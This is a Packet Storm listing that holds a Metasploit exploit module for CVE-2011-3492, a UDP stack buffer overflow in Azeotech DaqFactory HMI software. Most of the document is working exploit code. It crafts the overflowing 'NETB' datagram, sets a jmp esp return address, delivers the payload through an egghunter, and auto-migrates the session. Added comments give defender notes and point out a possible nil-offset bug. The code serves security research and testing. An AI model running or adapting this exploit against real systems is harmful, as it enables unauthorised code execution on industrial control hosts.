
packetstormLuigi AuriemmaPACKETSTORM:105222

DaqFactory HMI NETB Request Overflow

2011-09-19 00:00:00
Luigi Auriemma
packetstormsecurity.com

0.931 High

EPSS

Percentile

98.8%

`##  
# $Id: daq_factory_bof.rb 13756 2011-09-19 11:38:49Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
# Metasploit exploit module for CVE-2011-3492 (OSVDB 75496), a stack buffer
# overflow in the 'NETB' request handler of Azeotech DaqFactory, reachable over
# UDP on port 20034 (see the Description and the RPORT default below). The
# payload is staged through an egghunter, which is why the Description warns
# that exploitation can take a few seconds.
#
# Defender notes, grounded in the datagram #exploit builds: it begins with the
# literal "NETB", is filled almost entirely with upper-case alphabetic bytes,
# and the author's comment caps its length at 0x400 bytes. The
# 'InitialAutoRunScript' default of 'migrate -f' means a successful session
# leaves the DaqFactory process right away, so post-exploitation artefacts
# will live in a different process than the one that crashed.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Egghunter

  # Registers module metadata (name, references, payload constraints, the
  # single target) and the module options.
  #
  # @param info [Hash] module info to merge via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'DaqFactory HMI NETB Request Overflow',
      'Description' => %q{
This module exploits a stack buffer overflow in Azeotech's DaqFactory
product. The specfic vulnerability is triggered when sending a specially crafted
'NETB' request to port 20034. Exploitation of this vulnerability may take a few
seconds due to the use of egghunter. This vulnerability was one of the 14
releases discovered by researcher Luigi Auriemma.
},
      'Author' =>
        [
          'Luigi Auriemma', # Initial discovery, crash poc
          'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit
        ],

      'Version' => '$Revision: 13756 $',
      'References' =>
        [
          [ 'CVE', '2011-3492'],
          [ 'OSVDB', '75496'],
          [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          # A new session migrates out of the vulnerable process immediately.
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload' =>
        {
          # Constraints on the encoded payload that becomes the egg the hunter
          # searches for; only the NUL byte is excluded.
          'Space' => 600,
          'BadChars' => "\x00",
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
            {
              'Ret' => 0x100B9EDF, # jmp esp PEGRP32A.dll
              'Offset' => 636,     # base trailing-filler length, corrected in #exploit
            }
          ],
        ],
      'DisclosureDate' => 'Sep 13 2011',
      'DefaultTarget' => 0))

    register_options(
      [
        # Required for EIP offset: per the author's comments in #exploit, the
        # position of the overwritten return address shifts with the textual
        # length of this address.
        OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
        Opt::RPORT(20034)
      ], self.class)
  end

  # Builds one overflowing 'NETB' datagram, sends it over UDP, then hands off
  # to the payload handler.
  #
  # The author's comments indicate that the position of the overwritten return
  # address depends on the textual length of the target's DHCP server IP (the
  # 'DHCP' option), so the filler before the return address is adjusted first
  # and the trailing filler is shortened or lengthened to compensate.
  #
  # NOTE(review): the if/elsif chain below has no else branch and 'DHCP'
  # defaults to "". For any length outside 5..15, `offset` stays nil and the
  # comparison `offset >= 80` raises NoMethodError instead of a descriptive
  # failure; an explicit length check with a clear error would be friendlier —
  # assuming the framework does not already reject the empty required option.
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # The hunter scans memory for this 4-byte tag; checksum verification is off.
    eggoptions ={
      :checksum => false,
      :eggtag => 'scar',
    }

    # Correct the offset according to the 2nd IP (DHCP) length
    iplen = datastore['DHCP'].length

    # Every branch satisfies offset == 93 - iplen for iplen in 5..15; the chain
    # is kept explicit as the author wrote it.
    if iplen == 15
      offset = 78
    elsif iplen == 14
      offset = 79
    elsif iplen == 13
      offset = 80
    elsif iplen == 12
      offset = 81
    elsif iplen == 11
      offset = 82
    elsif iplen == 10
      offset = 83
    elsif iplen == 9
      offset = 84
    elsif iplen == 8
      offset = 85
    elsif iplen == 7
      offset = 86
    elsif iplen == 6
      offset = 87
    # attack class A ip, slightly unlikely, but just in case.
    elsif iplen == 5
      offset = 88
    end

    # Fold the DHCP-length correction into the trailing filler: offset and
    # finaloffset always sum to target['Offset'] + 80, so the datagram length
    # is independent of the DHCP string. The two branches cover every integer,
    # so the elsif behaves as an else.
    if offset >= 80
      pktoffset = offset - 80
      finaloffset = target['Offset']-pktoffset
    elsif offset <= 79
      pktoffset = 80 - offset
      finaloffset = target['Offset']+pktoffset
    end

    # springboard onto our unmodified payload
    p = Rex::Arch::X86.jmp(750) + payload.encoded
    hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)

    # Datagram layout, in order: the 4-byte "NETB" verb, 233 bytes of filler,
    # a NUL, the DHCP-length-dependent filler, two NOPs plus the hunter padded
    # to 52 bytes, the little-endian return address, 12 bytes of filler, a
    # short backward jump (2 + 12 + 4 + 52 = 70 bytes) landing on the two NOPs,
    # the egg, and trailing filler sized from finaloffset.
    sploit = "NETB" # NETB request overflow
    sploit << rand_text_alpha_upper(233)
    sploit << "\x00" # part of the packet structure
    sploit << rand_text_alpha_upper(offset) # include the offset for the DHCP address
    sploit << make_nops(2)
    sploit << hunter
    sploit << rand_text_alpha_upper(52-hunter.length-2)
    sploit << [target.ret].pack("V")
    sploit << rand_text_alpha_upper(12)
    sploit << Rex::Arch::X86.jmp_short(-70)
    sploit << egg
    # packetlen needs to be adjusted to a max of 0x400 as per advisory
    sploit << rand_text_alpha_upper(finaloffset-egg.length)

    # The use of rand_text_alpha_upper() ensures we always get the same length for the
    # first IP address. See the following for more details:
    # http://dev.metasploit.com/redmine/issues/5453
    sploit[12,4] = rand_text_alpha_upper(4)

    # Single datagram; there is no response parsing before handing off.
    udp_sock.put(sploit)

    handler
    disconnect_udp
  end

end
`

